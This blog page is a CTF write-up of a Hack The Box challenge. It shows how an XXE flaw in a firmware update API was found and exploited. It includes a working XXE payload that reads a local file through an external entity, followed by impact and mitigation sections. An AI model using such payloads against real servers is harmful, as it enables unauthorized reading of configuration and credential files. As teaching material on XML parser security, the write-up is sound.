<!doctype html>
<html lang="en">
  <head>
    <title>Jailbreak-CTF // Cyber security blog</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="blackcaesar0" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.4566c05e79be04e22fdb60fe026660a374366519139306a7223d2cab6fb660db.css" />
    
    <link rel="stylesheet" href="/css/custom.min.5af53ff6a9267e24ee96c3f1312dd379808c5a82b25f008d9e402843955e4f21.css" />
    

    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Jailbreak-CTF">
  <meta name="twitter:description" content="CTF Report: Exploiting XXE Vulnerability in Firmware Update Endpoint
1. Overview During this Capture The Flag (CTF) challenge, a vulnerability was identified in the firmware update functionality of a web application. The affected endpoint was /api/update, which accepted XML input. By exploiting an XML External Entity (XXE) vulnerability, it was possible to read arbitrary files from the server, leading to potential exposure of sensitive information.
2. Vulnerable Endpoint HTTP Method: POST Endpoint: /api/update Host: 94.237.52.137:31190 Content-Type: application/xml Legitimate Request Example POST /api/update HTTP/1.1 Host: 94.237.52.137:31190 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Content-Type: application/xml &lt;FirmwareUpdateConfig&gt; &lt;Firmware&gt; &lt;Version&gt;1.33.7&lt;/Version&gt; &lt;ReleaseDate&gt;2077-10-21&lt;/ReleaseDate&gt; &lt;Description&gt;Update includes advanced biometric lock functionality for enhanced security.&lt;/Description&gt; &lt;Checksum type=&#34;SHA-256&#34;&gt;9b74c9897bac770ffc029102a200c5de&lt;/Checksum&gt; &lt;/Firmware&gt; &lt;/FirmwareUpdateConfig&gt; Response: { &#34;message&#34;: &#34;Firmware version 1.33.7 update initiated.&#34; } 3. Exploiting the XXE Vulnerability By injecting an external entity referencing a local file, it was possible to extract data from the server. The following modified request was used to retrieve the contents of flag.txt:">

    <meta property="og:url" content="https://blackcaesar0.com/hackthebox/jailbreak_ctf/">
  <meta property="og:site_name" content="Cyber security blog">
  <meta property="og:title" content="Jailbreak-CTF">
  <meta property="og:description" content="CTF Report: Exploiting XXE Vulnerability in Firmware Update Endpoint
1. Overview During this Capture The Flag (CTF) challenge, a vulnerability was identified in the firmware update functionality of a web application. The affected endpoint was /api/update, which accepted XML input. By exploiting an XML External Entity (XXE) vulnerability, it was possible to read arbitrary files from the server, leading to potential exposure of sensitive information.
2. Vulnerable Endpoint HTTP Method: POST Endpoint: /api/update Host: 94.237.52.137:31190 Content-Type: application/xml Legitimate Request Example POST /api/update HTTP/1.1 Host: 94.237.52.137:31190 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Content-Type: application/xml &lt;FirmwareUpdateConfig&gt; &lt;Firmware&gt; &lt;Version&gt;1.33.7&lt;/Version&gt; &lt;ReleaseDate&gt;2077-10-21&lt;/ReleaseDate&gt; &lt;Description&gt;Update includes advanced biometric lock functionality for enhanced security.&lt;/Description&gt; &lt;Checksum type=&#34;SHA-256&#34;&gt;9b74c9897bac770ffc029102a200c5de&lt;/Checksum&gt; &lt;/Firmware&gt; &lt;/FirmwareUpdateConfig&gt; Response: { &#34;message&#34;: &#34;Firmware version 1.33.7 update initiated.&#34; } 3. Exploiting the XXE Vulnerability By injecting an external entity referencing a local file, it was possible to extract data from the server. The following modified request was used to retrieve the contents of flag.txt:">
  <meta property="og:locale" content="en">
  <meta property="og:type" content="article">
    <meta property="article:section" content="hackthebox">
    <meta property="article:published_time" content="2025-02-07T22:53:43+01:00">
    <meta property="article:modified_time" content="2025-02-07T22:53:43+01:00">


  </head>
  <body>
    <header class="app-header">
      <a href="/"><img class="app-header-avatar" src="/dragon.png" alt="blackcaesar0" /></a>
      <span class="app-header-title">blackcaesar0</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/about/">About</a>
             - 
          
          <a class="app-header-menu-item" href="/hackthebox/">Hackthebox</a>
      </nav>
      <p>Exploring cybersecurity, ethical hacking, and digital forensics—one exploit at a time.</p>
      <div class="app-header-social">
        
          <a href="https://github.com/blackcaesar0" target="_blank" rel="noreferrer noopener me">
            <svg class="icon icon-brand-github" viewBox="0 0 24 24" fill="currentColor"><title>GitHub</title><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg>
          </a>
        
          <a href="https://www.linkedin.com/in/blackcaesar0" target="_blank" rel="noreferrer noopener me">
            <svg class="icon icon-brand-linkedin" viewBox="0 0 24 24" fill="currentColor"><title>LinkedIn</title><path d="M20.447 20.452h-3.554v-5.569c0-1.328-.027-3.037-1.852-3.037-1.853 0-2.136 1.445-2.136 2.939v5.667H9.351V9h3.414v1.561h.046c.477-.9 1.637-1.85 3.37-1.85 3.601 0 4.267 2.37 4.267 5.455v6.286zM5.337 7.433c-1.144 0-2.063-.926-2.063-2.065 0-1.138.92-2.063 2.063-2.063 1.14 0 2.064.925 2.064 2.063 0 1.139-.925 2.065-2.064 2.065zm1.782 13.019H3.555V9h3.564v11.452zM22.225 0H1.771C.792 0 0 .774 0 1.729v20.542C0 23.227.792 24 1.771 24h20.451C23.2 24 24 23.227 24 22.271V1.729C24 .774 23.2 0 22.222 0h.003z"/></svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Jailbreak-CTF</h1>
      <div class="post-meta">
        <div>
          <svg class="icon icon-calendar" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>calendar</title><rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line></svg>
          Feb 7, 2025
        </div>
        <div>
          <svg class="icon icon-clock" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>clock</title><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
          2 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <p><strong>CTF Report: Exploiting XXE Vulnerability in Firmware Update Endpoint</strong></p>
<h3 id="1-overview"><strong>1. Overview</strong></h3>
<p>During this Capture The Flag (CTF) challenge, a vulnerability was identified in the firmware update functionality of a web application. The affected endpoint was <code>/api/update</code>, which accepted XML input. By exploiting an XML External Entity (XXE) vulnerability, it was possible to read arbitrary files from the server, leading to potential exposure of sensitive information.</p>
<h3 id="2-vulnerable-endpoint"><strong>2. Vulnerable Endpoint</strong></h3>
<ul>
<li><strong>HTTP Method:</strong> <code>POST</code></li>
<li><strong>Endpoint:</strong> <code>/api/update</code></li>
<li><strong>Host:</strong> <code>94.237.52.137:31190</code></li>
<li><strong>Content-Type:</strong> <code>application/xml</code></li>
</ul>
<h4 id="legitimate-request-example"><strong>Legitimate Request Example</strong></h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-http" data-lang="http"><span style="display:flex;"><span><span style="color:#a6e22e">POST</span> /api/update <span style="color:#66d9ef">HTTP</span><span style="color:#f92672">/</span><span style="color:#ae81ff">1.1</span>
</span></span><span style="display:flex;"><span>Host<span style="color:#f92672">:</span> <span style="color:#ae81ff">94.237.52.137:31190</span>
</span></span><span style="display:flex;"><span>User-Agent<span style="color:#f92672">:</span> <span style="color:#ae81ff">Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0</span>
</span></span><span style="display:flex;"><span>Accept<span style="color:#f92672">:</span> <span style="color:#ae81ff">*/*</span>
</span></span><span style="display:flex;"><span>Content-Type<span style="color:#f92672">:</span> <span style="color:#ae81ff">application/xml</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;FirmwareUpdateConfig&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;Firmware&gt;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&lt;Version&gt;</span>1.33.7<span style="color:#f92672">&lt;/Version&gt;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&lt;ReleaseDate&gt;</span>2077-10-21<span style="color:#f92672">&lt;/ReleaseDate&gt;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&lt;Description&gt;</span>Update includes advanced biometric lock functionality for enhanced security.<span style="color:#f92672">&lt;/Description&gt;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&lt;Checksum</span> <span style="color:#a6e22e">type=</span><span style="color:#e6db74">&#34;SHA-256&#34;</span><span style="color:#f92672">&gt;</span>9b74c9897bac770ffc029102a200c5de<span style="color:#f92672">&lt;/Checksum&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;/Firmware&gt;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;/FirmwareUpdateConfig&gt;</span>
</span></span></code></pre></div><ul>
<li><strong>Response:</strong></li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;message&#34;</span>: <span style="color:#e6db74">&#34;Firmware version 1.33.7 update initiated.&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h3 id="3-exploiting-the-xxe-vulnerability"><strong>3. Exploiting the XXE Vulnerability</strong></h3>
<p>By injecting an external entity referencing a local file, it was possible to extract data from the server. The following modified request was used to retrieve the contents of <code>flag.txt</code>:</p>
<h4 id="malicious-request-xxe-payload"><strong>Malicious Request (XXE Payload)</strong></h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-http" data-lang="http"><span style="display:flex;"><span><span style="color:#a6e22e">POST</span> /api/update <span style="color:#66d9ef">HTTP</span><span style="color:#f92672">/</span><span style="color:#ae81ff">1.1</span>
</span></span><span style="display:flex;"><span>Host<span style="color:#f92672">:</span> <span style="color:#ae81ff">94.237.52.137:31190</span>
</span></span><span style="display:flex;"><span>User-Agent<span style="color:#f92672">:</span> <span style="color:#ae81ff">Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0</span>
</span></span><span style="display:flex;"><span>Accept<span style="color:#f92672">:</span> <span style="color:#ae81ff">*/*</span>
</span></span><span style="display:flex;"><span>Content-Type<span style="color:#f92672">:</span> <span style="color:#ae81ff">application/xml</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">&lt;!DOCTYPE FirmwareUpdateConfig [
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">    &lt;!ENTITY xxe SYSTEM &#34;file:///flag.txt&#34;&gt;</span>
</span></span><span style="display:flex;"><span>]&gt;
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;FirmwareUpdateConfig&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;Firmware&gt;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&lt;Version&gt;</span>&amp;xxe;<span style="color:#f92672">&lt;/Version&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;/Firmware&gt;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;/FirmwareUpdateConfig&gt;</span>
</span></span></code></pre></div><h3 id="4-impact"><strong>4. Impact</strong></h3>
<ul>
<li>The vulnerability allows unauthorized access to sensitive files on the server.</li>
<li>An attacker could use this technique to read system configuration files, credentials, or other sensitive data.</li>
<li>Further exploitation might lead to privilege escalation or remote code execution depending on the system configuration.</li>
</ul>
<h3 id="5-mitigation"><strong>5. Mitigation</strong></h3>
<p>To prevent XXE attacks, the following security measures should be implemented:</p>
<ul>
<li><strong>Disable External Entities:</strong> Configure the XML parser to disallow external entity resolution.</li>
<li><strong>Use Whitelisting:</strong> Restrict XML input to predefined schemas.</li>
<li><strong>Sanitize User Input:</strong> Validate and sanitize XML input before processing.</li>
<li><strong>Employ Web Application Firewalls (WAF):</strong> Detect and block malicious requests.</li>
</ul>
<h3 id="6-conclusion"><strong>6. Conclusion</strong></h3>
<p>The XXE vulnerability in the firmware update endpoint allowed file disclosure from the server. Proper XML parsing security controls should be enforced to mitigate such risks. This challenge highlights the importance of secure XML handling in web applications.</p>
<hr>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
